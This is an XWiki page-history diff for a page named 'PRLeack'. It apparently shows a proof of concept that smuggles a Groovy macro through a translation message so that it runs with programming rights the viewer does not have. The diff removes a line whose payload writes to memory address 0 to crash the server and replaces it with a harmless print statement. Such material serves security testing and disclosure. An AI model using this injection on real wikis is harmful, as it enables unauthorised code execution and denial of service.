Changes for page PRLeack

Last modified by tuska on 2016/04/21 16:08

From version 3.1
edited by tuska
on 2016/04/21 16:05
Change comment: There is no comment for this version
To version 4.1
edited by tuska
on 2016/04/21 16:08
Change comment: There is no comment for this version

Summary

Details

Page properties
Content
... ... @@ -3,7 +3,7 @@
3 3   #if($xcontext.hasProgrammingRights())
4 4   You have PR, segfaulting the machine would be boring.
5 5   #else
6 - #set($msg = {'xe.spaces.action.index': '{{groovy}} new Random().unsafe.putAddress(0,0); {{/groovy}}'})
6 + #set($msg = {'xe.spaces.action.index': '{{groovy}} print "some groovy" {{/groovy}}'})
7 7   #includeTopic('Main.Spaces')
8 8   #end
9 9  #end